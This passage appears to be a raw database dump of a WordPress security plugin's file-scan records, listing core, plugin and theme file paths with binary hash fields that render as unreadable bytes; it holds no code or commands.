�Ɏ','',0,'?'),('zɐ���@�/�/@�','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�58O�O�}��s','����$9�dS>;�:���\n��ad_�X��[F','',0,'?'),('z.[�D8�R�','wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('z1o*�{��� �z','wp-includes/wp-includes/css/dist/block-library/common.css',0,'QD�����B+|lH��','QD�����B+|lH��','������\n(�c�CF���T�)I�� V+�','',0,'?'),('z;j2WD�6��[�V','wp-admin/js/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' -)���@O(���b�','��1�iLOU�m\r[X���00�\\�E�B���-','',0,'?'),('zSG�MV�ˠN�+��g','wp-content/plugins/wp-fastest-cache/images/cloudflare.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�~�\nܪ8�Bz���','��vB�`Ľ����q��Pg�I��e}�T��','',0,'?'),('zW�kэ��(��^%:�','wp-content/plugins/wp-fastest-cache/images/button-back-blood.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��q�\ZE���u��	','1�?�>>��MO�	�uC�S�����i��2�','',0,'?'),('zl,sW�6�uD�Wѵ�','wp-content/plugins/wordpress-seo/src/helpers/robots-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%����t<��[gz','9��M_�͐������@�:�)90�]��g_tX','',0,'?'),('zn^\0�k�ܦ{�&��','wp-content/plugins/wp-cerber/languages/wp-cerber-nb_NO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�����\"c�\\','v�+��>���v!�ɐ��O�pm�i','',0,'?'),('zn�3���,��M��m�','wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��A����c��I��c','H��D�\'3q6n)gatڶ��\'�@~��б�Uɂ','',0,'?'),('zo��ܲ�~��b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�5��uNi��!�z','����#���ɛ!w�c�w�؃}6���~A���','',0,'?'),('zq�B͍kX�h�\ZY','wp-content/plugins/wp-cerber/assets/flags/gb-wls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����+Ĕ8#n��Q�','�.�7�wmPPᰂ���n�Ab\"�S�vLȿ��','',0,'?'),('zt�S}�.���b��kg�','wp-content/plugins/redirection/locale/redirection-el.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r(xD�� \n�\0a���','���LG,$f~���(P~wj�9�ա(����','',0,'?'),('z|�����L��F�D�','wp-includes/css/dist/edit-widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�Rq�Φ�ѱ�ى��','���dഄ�Ȩv-ֺ����]���e','',0,'?'),('z��sDF��wPþ,�','wp-content/plugins/redirection/locale/redirection-ja.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�Th�I<3��0U�','��Jh�\"Z��#Q,�a��.����\0�Y','',0,'?'),('z�\Z�������T���','wp-content/themes/hitmag/inc/kirki/core/class-kirki-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0���9;��x�','�s\r�l74hKV�e�h�ޭ�O�F\"�I�','',0,'?'),('z�LM�����`6�-','wp-content/plugins/wordpress-seo/src/config/migrations/20200728095334_AddIndexesForProminentWordsOnIndexables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��w��P� F.!�\Z','U������x��\\�0f��Vy����o��','',0,'?'),('z�m�SA�}I���)','wp-includes/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('z���(o�@� �1�\n','wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php',0,'�EOxٕX�2떭؃','�EOxٕX�2떭؃','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('z�2]�w\'��=\"�-�4','wp-includes/blocks/query-pagination-previous/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�dCs�\Z[t�r�υ','���m1X9(��X�y>����+�y�S�fן0','',0,'?'),('z�5�*\ZADZCk��j��','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uO�{:qcV��\'','� at��v��dQ��0(�Ij�Ɩ�O��$e(*','',0,'?'),('z���L��5	g5�Ď�','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('z����8 L�{��q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/صtb�a���0�\'2','J��*e*��0��qCs\'GO.~r�1�OmS��4','',0,'?'),('z��Q<��\'��U~�R\\','wp-includes/css/wp-embed-template.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^<���_�J��Xw','\\!kj���i�ߔ���\"8�Z� �PJ��','',0,'?'),('z����JX�w{!\rF���','wp-admin/includes/class-wp-upgrader-skins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\"������ґ�-щ','.��7j3?̶��·?��2U�E�.�G�W','',0,'?'),('z�}����M�P�ˮ3','wp-content/themes/hitmag/inc/kirki/modules/loading/class-kirki-modules-loading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x[\r�d\'��9�ƞE�6','�ɧ�W�貮�N*���Zh�)�\n��%��H','',0,'?'),('z�[��A�k��y�0c�&','wp-includes/blocks/avatar/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���/V���A�*','h�I<F)EWʡ��� �z�<�{N\0�ۊ��>�','',0,'?'),('z΋ۗ�`�瀃��1\0','wp-includes/js/jquery/ui/effect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1}Y����z���4��','#b�rF4е�\'/�]����.~�98��r�Q4;/','',0,'?'),('z�W�sW5ʈ� )��','wp-includes/css/dist/customize-widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lK�s�wa�$`҅�S','�)?���̤���	�Q���pF�W\Zߣ','',0,'?'),('z������W�z�','wp-content/plugins/wp-cerber/languages/wp-cerber-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A<�8$,1\0u�ā�','�u���o�?]��(�b�q���b{@>\"H���','',0,'?'),('{\n���R�o��R=\'g�','wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���=�Y�P��O',']N�),�\04>A!f~\'�X�@]m��H���j�*','',0,'?'),('{��=2���?l�����','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ž�Ϧ�|n`��','%�–��\Z ��)evj��\0��ԁ����4n','',0,'?'),('{�\r�Yg���C�Kg','wp-includes/wp-includes/post-formats.php',0,'�h�%�J|,%Fś@','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('{N���2�Q�u��=	�','wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��( �a�Ԣ[�U?�','�����Јe�gT������G.��=�a\0@�','',0,'?'),('{>���/k�+X�:�','wp-content/plugins/wp-smushit/_src/js/smush/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+\ZO��k��3\ZqU','r%�ڔ$.�j��#����\'lڢ?n����W��8','',0,'?'),('{[�/����ڑ��','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܎�h�����(v1�','�\Z�le�knj\'=��|C���,\0��MlDG����','',0,'?'),('{]��2]$D�^sq','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-default-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{\0[��tKΛ��j@','1�}����\Z��Gh�o���;��#NaM�','',0,'?'),('{a�{4�;��Moز','wp-includes/block-template-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��4�K�؈8m�','�V�7�����\'7��+,gW�/�{Ng\\�','',0,'?'),('{o31���+�H)����','wp-content/plugins/wp-fastest-cache/images/icon-24x24.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8l���HZ������','^#�XK�D�q��l�sT�W]��*����D�3','',0,'?'),('{p!1��Z]KMC�*!','wp-content/plugins/redirection/locale/redirection-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�0�Zt\\%(\n�+��','vE	�j#�eh�I��}2:�c��1�K��AF�','',0,'?'),('{t�E~��P�A�1��','wp-admin/js/tags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�<@��7K>ʹ3��h�','ѷ��fR��*��z;ܓ�`���c6��|F�3','',0,'?'),('{y\"�ҵ��ݩ�{���','wp-admin/includes/class-walker-category-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���˕5T���>�c','3mط&7�8�m��Ӓ�x+�8��ʽ{d�k��','',0,'?'),('{�j�ɏ|n�	^<�WH�','wp-includes/css/dist/nux/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�ao����+\'�!�','�y6@*��xr��c���	���w+K�B�	O','',0,'?'),('{�)�4e4p:�fW�','wp-includes/js/jquery/jquery.query.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rġ��L�z;ҿ�0�','���ղ���<�C=��H�:�LW΍�9b�\n','',0,'?'),('{�᫤�}5�L#�E$�g','wp-content/plugins/wp-smushit/_src/js/modules/helpers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;���,�΁)��$�','SU�@�**�]�ԏ�~���1̶ijJ','',0,'?'),('{�@�\Z�3i�[Ȁ�>','wp-includes/wp-includes/class-wp-customize-manager.php',0,'-@�{�p\r���9�u','-@�{�p\r���9�u','O�PZ�y�s��6��z��r�4�QN�k��','',0,'?'),('{�@��Ѫ0�N��f���','wp-content/themes/twentytwentythree/templates/single.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�#�>�J=>��u','�I�fY�#�}�����<\\�F��2X�:����','',0,'?'),('{��\n�rI���','wp-admin/widgets-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�Cu�/����E','�ˎ��<!̋	j���]]���i	�6�','',0,'?'),('{�RC��\Z�.*\"�Q','wp-includes/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�O��ד�\0ѸО�T','N��`��\n��n�~{��8b��u��j����A?�U','',0,'?'),('{�\r�-��}�^��','wp-includes/images/smilies/frownie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('{�;�13�84��/','wp-content/plugins/wordpress-seo/admin/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~vPJ�tЩ>��','W��=r��Q�,*��K\0U��W�Ml���O','',0,'?'),('{���?���\r��\n\'','wp-admin/images/imgedit-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\\2���}�G�i;O','T�N�~��-�@��N��̞V�\\��(u$��','',0,'?'),('|\0��m�hܼc\\��W ','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-strip_exif@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xj��.�m#�����d','�|P�c�\nH1�50*�M�g���Η��n�@�_�2','',0,'?'),('|j��x7�(Q}�0�\'�','wp-admin/css/list-tables.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nᕌi`f�i�6��','�:cݥ�\"�L~x�3bZ�Y��i%éS��@|�','',0,'?'),('|���L��F8�5<ZM','wp-includes/blocks/gallery/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�qKZ�%��~~��w','ՋO	�_`�jU��qR�Ӣ���K���9O�R','',0,'?'),('|-����z��-�','wp-admin/export-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�FP����� �Y(','1�.�7k����п�\"�aYfv�|ny+W�|Tv�','',0,'?'),('|.]����0��','wp-includes/blocks/pullquote/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�*�aõ�ĭ�c�F','�6����ʃ�\\-R=��pZ�ͪ�\\4���J','',0,'?'),('|/ڒ�\0[*4��x��','wp-includes/js/admin-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('|4,��\r\"ɱ�؊��o','wp-content/plugins/redirection/api/api-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�=t���DJ�Jk�)�','���?ʷ��f1�l!\\tU-ҭ-��+�ε','',0,'?'),('|?�mF���2�����','wp-content/plugins/wordpress-seo/src/helpers/aioseo-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��L�(H���\r3sq�r','_����6�5�1ghwߗ!s�	m@��	�','',0,'?'),('|N!�;x�N&�g��m�','wp-admin/js/widgets/media-image-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G9�Fm�qQ��','J�6�%V��\"�\rK�yɳ�h���8�N�����F','',0,'?'),('|\\~S���Oj���/�t','wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php',0,'X��U iU0�ll9�c','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('|a�i)ݣ�}��3�','wp-includes/wp-includes/class-wp-site-query.php',0,'*Wy�\ng�MP��)�p1','*Wy�\ng�MP��)�p1','���C�ƙ&���v����\"�[�SK@�	��Π@','',0,'?'),('|i��3�V���m�q�Ŧ','wp-content/plugins/wp-cerber/assets/flags/tg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�j̓UZ=��9�`��','T�W��r�>Z>��3��D\'��_L_ψ��S','',0,'?'),('|l�+F��#ڟ�����','wp-includes/class-wp-user-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�_�T�v|���0�','M{XP�~\0�*>�ekQYU���P�W#`D�%','',0,'?'),('|m�1\0��z�^�m�{�','wp-includes/css/dist/customize-widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G|lݥ�N[�脿`��','�W�v�|�hX����V}�~��m�\"-U�@��','',0,'?'),('|p�;��{�� �4aO','wp-content/plugins/wp-cerber/assets/flags/ne.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~d�J������j','\'3�8��\"�\\T�j\'�QH�<T.�ԃ����d����','',0,'?'),('|�3�=#zJ;�$�O�jh','wp-content/plugins/redirection/matches/user-agent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y]��E�J�','5\"��y`�\0��byY5�mv\'��B\'\\�','',0,'?'),('|��\\w�4�ѸQj���','wp-includes/wp-includes/images/crystal/video.png',0,'���l��ڤ�;�=','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('|�� �4�x�\\��M�n','wp-admin/js/code-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�_y��[�?@gs���7','�4�*q|�2�*�\\��0�t&oJ���Q�*�','',0,'?'),('|���͉5l����$��]','wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js',0,'�B�\n�4�\\��0�=','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('|���4�)�=3}&Ϥ�','wp-content/plugins/wordpress-seo/src/conditionals/get-request-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�al	�$G��Lr��jq','�:sT����)�0�P*�<�j5\"�w&�cRb�','',0,'?'),('|�s�k��[�c���Й','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��Z�f�o��|�TQ�','ҕN b�MN����p\"�O��J���B\"�ժ�a�','',0,'?'),('|�.]鷖��\Z\\:AӉ','wp-content/plugins/all-in-one-wp-security-and-firewall/templates/notices/horizontal-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&D_rJr����','��7�	�DM7����T��ϩ���%���\"���','',0,'?'),('|��T]��:Y$=\'h�','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{��4�o�V�\'','D�?#}$�e�w2�6#��0M�Ë��RS�L�','',0,'?'),('|��,��Q����w�[','wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js',0,'���*Bz��L��','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('|��Y�>��	�Ɔ�','wp-admin/link-add.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nP�U���-\r`(�l','��!��>e���:�Ⓝ���?\r�}k?ms�','',0,'?'),('}ĉ=�t�����','wp-includes/images/toggle-arrow-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('}�aX�]���D*I','wp-includes/blocks/file/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�anQY�TUf�I�','Q-aΆ11�q#9�j\'o�&<�(\"e�^>�','',0,'?'),('}^��~5���w��','wp-content/plugins/wp-fastest-cache/inc/css-utilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\"�Y�.ށ™B','p�OH��\Z�E#��W��&Fs�С(N�O�Eǁ','',0,'?'),('})��V�7�]wc���','wp-includes/wp-includes/js/wp-custom-header.js',0,'+,�!�ڊLӺ~ν7�','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('}6�)�PjG�����','wp-content/plugins/wp-fastest-cache/images/rocket.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��}h*I�eɵ��','DUu���Ii`�m%��]Ն�P�#l�G&b��','',0,'?'),('}<��}#*%�V>��ɖ','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u+q=���~@ɦ��<��','T�	�v��3T@& �zp�a�̺�.V����y','',0,'?'),('}C�B��-u�H�}�','wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',0,'3°�\nᄷ�\0�a��','3°�\nᄷ�\0�a��','`	\\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('}E�O��S�<j� ','wp-content/themes/twentytwentythree/patterns/hidden-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ק��M�Tt_\Z{�!��','�\"B���KG\'��ܩ��~M��� �&gS��]�','',0,'?'),('}O� !ٶ]�O�O[�','wp-includes/block-supports/typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������]�+(5 ','�x�I���k��T�}pN���ߣi�K�4��','',0,'?'),('}\\�5�\r��$�l�W���','wp-admin/js/tags-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��\rA/vX�A�','����3V��Mv\Z�r���s\Z>)�(nu�S�','',0,'?'),('}`��g\"P�2��V��','wp-includes/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('}|��\0+�N�6]��R','wp-includes/blocks/audio/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�*��O\Z�Gcu�_�H','�)NO�x-�ƌ^�F�s\Z��+�����[9��s','',0,'?'),('}��l�8�\\�;���~','wp-includes/blocks/social-links/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)N+�g`,���','���{��״k=�E�楖5�/Ù4.�(Jn���','',0,'?'),('}��-�$��L�H_R���','wp-includes/blocks/paragraph/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�$�)tz��\n�ю','�]I��#�䟔�6d�\rZR��F���<�ɿS','',0,'?'),('}�7 ޘ�DHD�Pl','wp-includes/SimplePie/Registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;M���{�ٟ�R','Ԧ0-�/�\\k����W��%o��ޏ\'E)���D��','',0,'?'),('}“��b�`�I-���0�','wp-content/plugins/wordpress-seo/js/dist/externals/styledComponents.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`�U��Z%�~�)U','K�D4%��>�n�4@}Nw^�4��ת�z0��','',0,'?'),('}�L�|z!`j`s��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/vi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��Kڐ\n�X��~�g','}��\r�C\\і|���6\'��1�v\Z�!�;�n,Q','',0,'?'),('}��H��j�b_Q����','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a)t��xF�+/p��','��iC:snJ�k_����7\'p��� 6]\r��','',0,'?'),('}��Nտo�p�ꛥ!','wp-includes/wp-includes/js/thickbox/thickbox.css',0,'7��P�R�n�,(�f�','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('}�D߅����N�_','wp-content/plugins/wordpress-seo/src/surfaces/values/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W|F������#�=՟','�}/d�W�:+��Qn�vګ	�~��T@?V%(','',0,'?'),('}�>��$6;O_Q�u','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-settings-repeater-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�W�%�2+�,�\Z&','�Q��W��e�P����/�a���ʧ�5KΪ�','',0,'?'),('}�Ȑ�\\L��`���i)','wp-includes/ID3/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GؐV%�P_��շ�','�I>��a�*R8?�)�p1�U͔�?2�=o��','',0,'?'),('}���{RҢ���\"','wp-includes/default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B���#�PÆ��5','C��%�E���Œ]�J�2���.��‚\Z�\Z�','',0,'?'),('~f��$�0�d9-n','wp-content/plugins/wordpress-seo/src/presentations/abstract-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@(�s�S̜�/<�','k��S�������P/>q�܏��L�-@�H�cf','',0,'?'),('~Ⱦ/�m�ր�!��','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�X]�[sC>�Q��','�>��_c\ZJ+�����a��������Umv)�lg','',0,'?'),('~\Z�?O��t�Y�1��','wp-includes/blocks/comments-pagination-numbers/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ңʟ����;�Vkn4','Lc߽4!BĢ:[���Z���\r��Q��y�','',0,'?'),('~��\\��_b�$�-��!','wp-includes/js/jquery/ui/selectable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�Nb�d*��bNu��C','l���I�-)�jWE��e�����;�h�Ҳ','',0,'?'),('~ A�@�[�����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-info-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�@�C�U�h�R~\\:','�^\Z�g�(�p(\n��!\"�ͭBy�E\"3;σ�','',0,'?'),('~\'�C_�h�F�ƶ��','wp-content/plugins/wordpress-seo/src/services/importing/aioseo/aioseo-social-images-provider-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��΄�_}9tqކ8��','2�N�._��+�P	�A���xe���9��t2�(','',0,'?'),('~2+�7<��K���.�b','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-���N�D�8Gڔ','�����9L�V%+ F�–d~._&}','',0,'?'),('~?�J�I�b*׺�e�C','wp-admin/images/resize.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN������','�6󀏸��&?�5��?s�qGM`P;','',0,'?'),('~A�H�g��KT��','wp-includes/Requests/Utility/CaseInsensitiveDictionary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�j���h�^\0��{�','o���\r1d._��f/�7q�A�E����','',0,'?'),('~F��㫎>dy��j�','wp-includes/css/jquery-ui-dialog-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�+x)���A�v6@�@','�/��N��e$�������2:.�}b#�K}','',0,'?'),('~J�J�a�M�:1�rS','wp-content/plugins/wordpress-seo/src/config/migrations/20200430075614_AddIndexableObjectIdAndTypeIndex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��\Z��/亄VT�','izN���\r��>�I���{KZ�b�ӿp��','',0,'?'),('~VXA��&_�M�@em','wp-content/plugins/wordpress-seo/admin/class-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��3q6@L��|�','#�c�eB�VW>�:�?�!���l G1�(�t','',0,'?'),('~V��Xa]�7p�|R','wp-includes/class-wp-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I��\0�Yө�','R��HbT.�ueE$�͚FD+�����j��3Sł','',0,'?'),('~^f=UP�����k1�','wp-content/plugins/wordpress-seo/src/initializers/migration-runner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R����\\��`t��','�;���6�n�����,�_��������FU�','',0,'?'),('~i�I�;ݭ]�A��S','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54��⓿�`�����','D��Oo;o�O]+�\0���5�]/\"�޸&�Q�','',0,'?'),('~q�IP�I���r��','wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eY����۬x2���Y','���g�Hn����~<�0^Ff88���.%x8','',0,'?'),('~}�{ ��>D�}�<','wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�3�;�7��v:�P���','JlA��Z��q��F�v�<3�I^��k�','',0,'?'),('~�?ͻy�]!q��','wp-content/plugins/disable-gutenberg/inc/resources-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vm�zi�Bܲ�����','��N<���o��)�˘�\\9�T!\Z���(�V&:u','',0,'?'),('~��ReOX�f2��`�','wp-includes/class-wp-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6<b���Tr���','�	m�\\��|+��3���´x�3V�wg','',0,'?'),('~�C0��2�3*���J','wp-includes/blocks/more/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�09I1=k��P�.��','��2��q������=�����4�+ʫ^���','',0,'?'),('~��fz�M9A�N�2��3','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��CN�(�� w�S��','������\'\\8Ҭe����\Z�Gܠ8�78z�I','',0,'?'),('~���*޿S�̙e�','wp-admin/images/freedom-3.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(�縫\ZX��֚�1l','集(���;�F�\n�k����Q���u�','',0,'?'),('~�x�J�U_<m����n','wp-includes/wp-includes/js/tinymce/utils/editable_selects.js',0,'�J��q2��I\'�J�9�E','�J��q2��I\'�J�9�E','�v��Gjs��f��	e�d�&�g��+���','',0,'?'),('~�Pf��ԩ~1�LYw�','wp-includes/blocks/button/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�R�o�sd>[р�','T�\nv��|ص��J[�S��e\nݴ�fTe9m�','',0,'?'),('~����